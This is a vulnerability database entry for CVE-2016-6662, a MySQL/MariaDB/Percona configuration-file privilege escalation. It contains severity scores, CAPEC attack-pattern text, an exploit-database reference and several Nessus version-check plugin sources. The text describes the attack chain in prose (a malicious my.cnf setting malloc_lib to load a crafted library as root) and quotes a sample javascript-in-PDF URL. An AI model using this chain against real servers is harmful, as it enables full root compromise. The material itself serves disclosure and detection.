Vulnerabilities > CVE-2016-6662 - Permissions, Privileges, and Access Controls vulnerability in multiple products

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
oracle
percona
mariadb
debian
redhat
CWE-264
critical
nessus
exploit available

Summary

Oracle MySQL through 5.5.52, 5.6.x through 5.6.33, and 5.7.x through 5.7.15; MariaDB before 5.5.51, 10.0.x before 10.0.27, and 10.1.x before 10.1.17; and Percona Server before 5.5.51-38.1, 5.6.x before 5.6.32-78.0, and 5.7.x before 5.7.14-7 allow local users to create arbitrary configurations and bypass certain protection mechanisms by setting general_log_file to a my.cnf configuration. NOTE: this can be leveraged to execute arbitrary code with root privileges by setting malloc_lib. NOTE: the affected MySQL version information is from Oracle's October 2016 CPU. Oracle has not commented on third-party claims that the issue was silently patched in MySQL 5.5.52, 5.6.33, and 5.7.15.

Vulnerable Configurations

Part Description Count
Application
Oracle
108
Application
Percona
97
Application
Mariadb
64
Application
Redhat
5
OS
Debian
1
OS
Redhat
15

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Accessing, Modifying or Executing Executable Files
    An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
  • Blue Boxing
    This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.
  • Restful Privilege Elevation
    Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
  • Target Programs with Elevated Privileges
    This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call.

Exploit-Db

descriptionMySQL / MariaDB / PerconaDB 5.5.52 / 5.6.33 / 5.7.15 - Code Execution / Privilege Escalation. CVE-2016-6662. Local exploit for Linux platform
fileexploits/linux/local/40360.txt
idEDB-ID:40360
last seen2016-09-12
modified2016-09-12
platformlinux
port3306
published2016-09-12
reporterDawid Golunski
sourcehttps://www.exploit-db.com/download/40360/
titleMySQL / MariaDB / PerconaDB 5.5.52 / 5.6.33 / 5.7.15 - Code Execution / Privilege Escalation
typelocal

Nessus

  • NASL familyDatabases
    NASL idMYSQL_5_7_15_RPM.NASL
    descriptionThe version of MySQL running on the remote host is 5.7.x prior to 5.7.15. It is, therefore, affected by multiple vulnerabilities : - Multiple unspecified flaws exist in the Optimizer subcomponent that allow an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492, CVE-2016-5632) - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the Error Handling subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5617) - An unspecified flaw exists in the Packaging subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5625) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5629) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-04
    modified2016-09-08
    plugin id93380
    published2016-09-08
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93380
    titleMySQL 5.7.x < 5.7.15 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(93380);
      script_version("1.12");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/03");
    
      script_cve_id(
        "CVE-2016-3492",
        "CVE-2016-5507",
        "CVE-2016-5616",
        "CVE-2016-5617",
        "CVE-2016-5625",
        "CVE-2016-5626",
        "CVE-2016-5629",
        "CVE-2016-5632",
        "CVE-2016-6662",
        "CVE-2016-6663",
        "CVE-2016-8283",
        "CVE-2016-8286"
      );
      script_bugtraq_id(
        92911,
        92912,
        93612,
        93614,
        93617,
        93638,
        93650,
        93668,
        93678,
        93693,
        93737,
        93745
      );
      script_xref(name:"EDB-ID", value:"40360");
    
      script_name(english:"MySQL 5.7.x < 5.7.15 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of MySQL server.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote database server is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of MySQL running on the remote host is 5.7.x prior to
    5.7.15. It is, therefore, affected by multiple vulnerabilities :
    
      - Multiple unspecified flaws exist in the Optimizer
        subcomponent that allow an authenticated, remote
        attacker to cause a denial of service condition.
        (CVE-2016-3492, CVE-2016-5632)
    
      - An unspecified flaw exists in the InnoDB subcomponent
        that allows an authenticated, remote attacker to cause a
        denial of service condition. (CVE-2016-5507)
    
      - An unspecified flaw exists in the MyISAM subcomponent
        that allows a local attacker to gain elevated
        privileges. (CVE-2016-5616)
    
      - An unspecified flaw exists in the Error Handling
        subcomponent that allows a local attacker to gain
        elevated privileges. (CVE-2016-5617)
    
      - An unspecified flaw exists in the Packaging subcomponent
        that allows a local attacker to gain elevated
        privileges. (CVE-2016-5625)
    
      - An unspecified flaw exists in the GIS subcomponent that
        allows an authenticated, remote attacker to cause a
        denial of service condition. (CVE-2016-5626)
    
      - An unspecified flaw exists in the Federated subcomponent
        that allows an authenticated, remote attacker to cause a
        denial of service condition. (CVE-2016-5629)
    
      - A flaw exists in the check_log_path() function within
        file sql/sys_vars.cc due to inadequate restrictions on
        the ability to write to the my.cnf configuration file
        and allowing the loading of configuration files from
        path locations not used by current versions. An
        authenticated, remote attacker can exploit this issue
        by using specially crafted queries that utilize logging
        functionality to create new files or append custom
        content to existing files. This allows the attacker to
        gain root privileges by inserting a custom .cnf file
        with a 'malloc_lib=' directive pointing to specially
        crafted mysql_hookandroot_lib.so file and thereby cause
        MySQL to load a malicious library the next time it is
        started. (CVE-2016-6662)
    
      - An unspecified flaw exists that allows an authenticated,
        remote attacker to bypass restrictions and create the
        /var/lib/mysql/my.cnf file with custom contents without
        the FILE privilege requirement. (CVE-2016-6663)
        
      - An unspecified flaw exists in the Types subcomponent
        that allows an authenticated, remote attacker to cause
        a denial of service condition.(CVE-2016-8283)
    
      - An unspecified flaw exists in the Security: Privileges
        subcomponent that allows an authenticated, remote
        attacker to disclose sensitive information.
        (CVE-2016-8286)
    
      - A flaw exists that is related to the use of temporary
        files by REPAIR TABLE. An authenticated, remote attacker
        can exploit this to gain elevated privileges.
    
      - A flaw exists in InnoDB when handling an operation that
        dropped and created a full-text search table. An
        authenticated, remote attacker can exploit this to
        trigger an assertion, resulting in a denial of service
        condition.
    
      - A flaw exists in InnoDB when accessing full-text
        auxiliary tables while dropping the indexed table. An
        authenticated, remote attacker can exploit this to
        trigger an assertion, resulting in a denial of service
        condition.
    
      - A buffer overflow condition exists when handling long
        integer values in MEDIUMINT columns due to the improper
        validation of certain input. An authenticated, remote
        attacker can exploit this to cause a denial of service
        condition or the execution of arbitrary code.
    
      - An information disclosure vulnerability exists in the
        validate_password plugin due to passwords that have been
        rejected being written as plaintext to the error log. A
        local attacker can exploit this to more easily guess
        what passwords might have been chosen and accepted.
    
      - A flaw exists in InnoDB when handling an ALTER TABLE ...
        ENCRYPTION='Y', ALGORITHM=COPY operation that is applied
        to a table in the system tablespace. An authenticated,
        remote attacker can exploit this to trigger an
        assertion, resulting in a denial of service condition.
    
    Note that Nessus has not tested for these issues but has instead
    relied only on the application's self-reported version number.");
      # http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bac902d5");
      script_set_attribute(attribute:"see_also", value:"https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html");
      # http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?fbd97f45");
      # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3235388.xml
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?453a538d");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to MySQL version 5.7.15 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-6662");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/06");
      script_set_attribute(attribute:"patch_publication_date", value:"2016/09/06");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/08");
    
      script_set_attribute(attribute:"agent", value:"unix");
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fermilab:scientific_linux:mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mysql");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mysql");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Databases");
    
      script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled");
      script_require_ports("Host/RedHat/release", "Host/AmazonLinux/release", "Host/SuSE/release", "Host/CentOS/release");
    
      exit(0);
    }
    
    include("mysql_version.inc");
    
    fix_version = "5.7.15";
    exists_version = "5.7";
    
    mysql_check_rpms(mysql_packages:default_mysql_rpm_list_server_only, fix_ver:fix_version, exists_ver:exists_version, rhel_os_list:default_mysql_rhel_os_list, centos_os_list:default_mysql_centos_os_list, suse_os_list:default_mysql_suse_os_list, ala_os_list:default_mysql_ala_os_list, severity:SECURITY_HOLE);
    
  • NASL familyUbuntu Local Security Checks
    NASL idUBUNTU_USN-3078-1.NASL
    descriptionDawid Golunski discovered that MySQL incorrectly handled configuration files. A remote attacker could possibly use this issue to execute arbitrary code with root privileges. MySQL has been updated to 5.5.52 in Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. Ubuntu 16.04 LTS has been updated to MySQL 5.7.15. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes. Please see the following for more information: http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-51.html http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html http://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-14.html http://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id93510
    published2016-09-15
    reporterUbuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93510
    titleUbuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : mysql-5.5, mysql-5.7 vulnerability (USN-3078-1)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Ubuntu Security Notice USN-3078-1. The text 
    # itself is copyright (C) Canonical, Inc. See 
    # <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered 
    # trademark of Canonical, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(93510);
      script_version("2.10");
      script_cvs_date("Date: 2019/09/18 12:31:46");
    
      script_cve_id("CVE-2016-6662");
      script_xref(name:"USN", value:"3078-1");
    
      script_name(english:"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS : mysql-5.5, mysql-5.7 vulnerability (USN-3078-1)");
      script_summary(english:"Checks dpkg output for updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Ubuntu host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Dawid Golunski discovered that MySQL incorrectly handled configuration
    files. A remote attacker could possibly use this issue to execute
    arbitrary code with root privileges.
    
    MySQL has been updated to 5.5.52 in Ubuntu 12.04 LTS and Ubuntu 14.04
    LTS. Ubuntu 16.04 LTS has been updated to MySQL 5.7.15.
    
    In addition to security fixes, the updated packages contain bug fixes,
    new features, and possibly incompatible changes.
    
    Please see the following for more information:
    http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-51.html
    http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html
    http://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-14.html
    http://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Ubuntu security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://usn.ubuntu.com/3078-1/"
      );
      script_set_attribute(
        attribute:"solution", 
        value:
    "Update the affected mysql-server-5.5 and / or mysql-server-5.7
    packages."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.5");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:mysql-server-5.7");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:12.04:-:lts");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:14.04");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:16.04");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/20");
      script_set_attribute(attribute:"patch_publication_date", value:"2016/09/13");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/15");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Ubuntu Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("ubuntu.inc");
    include("misc_func.inc");
    
    if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/Ubuntu/release");
    if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu");
    release = chomp(release);
    if (! preg(pattern:"^(12\.04|14\.04|16\.04)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 12.04 / 14.04 / 16.04", "Ubuntu " + release);
    if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu);
    
    flag = 0;
    
    if (ubuntu_check(osver:"12.04", pkgname:"mysql-server-5.5", pkgver:"5.5.52-0ubuntu0.12.04.1")) flag++;
    if (ubuntu_check(osver:"14.04", pkgname:"mysql-server-5.5", pkgver:"5.5.52-0ubuntu0.14.04.1")) flag++;
    if (ubuntu_check(osver:"16.04", pkgname:"mysql-server-5.7", pkgver:"5.7.15-0ubuntu0.16.04.1")) flag++;
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_HOLE,
        extra      : ubuntu_report_get()
      );
      exit(0);
    }
    else
    {
      tested = ubuntu_pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mysql-server-5.5 / mysql-server-5.7");
    }
    
  • NASL familyDatabases
    NASL idMYSQL_5_6_33.NASL
    descriptionThe version of MySQL running on the remote host is 5.6.x prior to 5.6.33. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-01
    modified2020-06-02
    plugin id93377
    published2016-09-08
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93377
    titleMySQL 5.6.x < 5.6.33 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(93377);
      script_version("1.14");
      script_cvs_date("Date: 2019/11/14");
    
      script_cve_id("CVE-2016-5507", "CVE-2016-6662", "CVE-2016-6663");
      script_bugtraq_id(92911, 92912, 93678);
      script_xref(name:"EDB-ID", value:"40360");
    
      script_name(english:"MySQL 5.6.x < 5.6.33 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of MySQL server.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote database server is affected by multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "The version of MySQL running on the remote host is 5.6.x prior to
    5.6.33. It is, therefore, affected by multiple vulnerabilities :
    
      - An unspecified flaw exists in the InnoDB subcomponent
        that allows an authenticated, remote attacker to cause a
        denial of service condition. (CVE-2016-5507)
    
      - A flaw exists in the check_log_path() function within
        file sql/sys_vars.cc due to inadequate restrictions on
        the ability to write to the my.cnf configuration file
        and allowing the loading of configuration files from
        path locations not used by current versions. An
        authenticated, remote attacker can exploit this issue
        by using specially crafted queries that utilize logging
        functionality to create new files or append custom
        content to existing files. This allows the attacker to
        gain root privileges by inserting a custom .cnf file
        with a 'malloc_lib=' directive pointing to specially
        crafted mysql_hookandroot_lib.so file and thereby cause
        MySQL to load a malicious library the next time it is
        started. (CVE-2016-6662)
    
      - An unspecified flaw exists that allows an authenticated,
        remote attacker to bypass restrictions and create the
        /var/lib/mysql/my.cnf file with custom contents without
        the FILE privilege requirement. (CVE-2016-6663)
        
      - A flaw exists that is related to the use of temporary
        files by REPAIR TABLE. An authenticated, remote attacker
        can exploit this to gain elevated privileges.
    
      - A flaw exists in InnoDB when handling an operation that
        dropped and created a full-text search table. An
        authenticated, remote attacker can exploit this to
        trigger an assertion, resulting in a denial of service
        condition.
    
      - A flaw exists in InnoDB when accessing full-text
        auxiliary tables while dropping the indexed table. An
        authenticated, remote attacker can exploit this to
        trigger an assertion, resulting in a denial of service
        condition.
    
      - A buffer overflow condition exists when handling long
        integer values in MEDIUMINT columns due to the improper
        validation of certain input. An authenticated, remote
        attacker can exploit this to cause a denial of service
        condition or the execution of arbitrary code.
    
      - An unspecified flaw exists due to how a prepared
        statement uses a parameter in the select list of a
        derived table that was part of a join. An authenticated,
        remote attacker can exploit this to cause a server exit,
        resulting in a denial of service condition.
    
    Note that Nessus has not tested for these issues but has instead
    relied only on the application's self-reported version number.");
      # http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?bac902d5");
      script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html");
      # http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?fbd97f45");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to MySQL version 5.6.33 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-6662");
    
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"in_the_news", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/06");
      script_set_attribute(attribute:"patch_publication_date", value:"2016/09/06");
      script_set_attribute(attribute:"plugin_publication_date", value:"2016/09/08");
    
      script_set_attribute(attribute:"potential_vulnerability", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:mysql");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Databases");
    
      script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("mysql_version.nasl", "mysql_login.nasl");
      script_require_keys("Settings/ParanoidReport");
      script_require_ports("Services/mysql", 3306);
    
      exit(0);
    }
    
    include("mysql_version.inc");
    
    mysql_check_version(fixed:'5.6.33', min:'5.6', severity:SECURITY_HOLE);
    
  • NASL familyDatabases
    NASL idMYSQL_5_6_33_RPM.NASL
    descriptionThe version of MySQL running on the remote host is 5.6.x prior to 5.6.33. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the InnoDB subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5507) - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-04
    modified2016-09-08
    plugin id93378
    published2016-09-08
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93378
    titleMySQL 5.6.x < 5.6.33 Multiple Vulnerabilities
  • NASL familyDatabases
    NASL idMARIADB_10_0_27.NASL
    descriptionThe version of MariaDB running on the remote host is 10.0.x prior to 10.0.27. It is, therefore, affected by multiple vulnerabilities : - A flaw exists in the check_log_path() function within file sql/sys_vars.cc due to inadequate restrictions on the ability to write to the my.cnf configuration file and allowing the loading of configuration files from path locations not used by current versions. An authenticated, remote attacker can exploit this issue by using specially crafted queries that utilize logging functionality to create new files or append custom content to existing files. This allows the attacker to gain root privileges by inserting a custom .cnf file with a
    last seen2020-06-01
    modified2020-06-02
    plugin id93609
    published2016-09-20
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93609
    titleMariaDB 10.0.x < 10.0.27 Multiple Vulnerabilities
  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2016-2595.NASL
    descriptionAn update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a newer upstream version: mariadb (5.5.52). (BZ#1304516, BZ#1377974) Security Fix(es) : * It was discovered that the MariaDB logging functionality allowed writing to MariaDB configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server. (CVE-2016-6662) * A race condition was found in the way MariaDB performed MyISAM engine table repair. A database user with shell access to the server running mysqld could use this flaw to change permissions of arbitrary files writable by the mysql system user. (CVE-2016-6663) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2016-3492, CVE-2016-5612, CVE-2016-5616, CVE-2016-5624, CVE-2016-5626, CVE-2016-5629, CVE-2016-8283) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.
    last seen2020-06-01
    modified2020-06-02
    plugin id95341
    published2016-11-28
    reporterThis script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/95341
    titleCentOS 7 : mariadb (CESA-2016:2595)
  • NASL familySlackware Local Security Checks
    NASL idSLACKWARE_SSA_2016-257-01.NASL
    descriptionNew mariadb or mysql packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix a security issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id93484
    published2016-09-15
    reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/93484
    titleSlackware 14.0 / 14.1 / 14.2 / current : mariadb / mysql (SSA:2016-257-01)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2017-0184.NASL
